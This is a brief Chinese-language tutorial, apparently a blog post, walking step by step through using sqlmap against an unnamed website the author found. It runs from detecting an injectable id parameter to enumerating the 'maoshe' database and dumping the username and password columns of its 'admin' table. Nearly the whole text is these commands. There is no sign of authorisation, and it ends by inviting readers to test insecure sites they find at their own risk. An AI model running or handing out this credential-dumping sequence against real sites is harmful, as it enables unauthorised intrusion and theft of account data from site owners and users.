SQLMap扫描不安全web网站的流程
首先收集到目标的网址 此处我不做展示
打开linux 上的终端输入 sqlmap -u "url" 对目标网址进行扫描
发现目标存在漏洞(其id是可注入的)
接着我们输入sqlmap -u "url" --dbs 来查询目标的数据库 我查询到了三个
接着我们来看一些我们所浏览的页面(url)在哪个数据库中
输入sqlmap -u "url" --current-db 发现在 maoshe中
接着我们来查询maoshe中的数据表
输入sqlmap -u "url" -D "maoshe" --tables
发现其数据库下有四个表 然后我们来浏览数据表中的字段(我这里查询的是admin数据表中的字段)
输入sqlmap -u "url" -D "maoshe" -T "admin" --columns
最后我们破译数据库字段中的信息
输入sqlmap -u "url" -D "maoshe" -T "admin" -C "username,password" --dump
这样我们就成功扫描了一个不安全网站的数据库
此文只是一个测试案例 如果读者你发现了一个不安全网站 请想清楚后果再去测试
后果自负
如有错误请纠正 谢谢
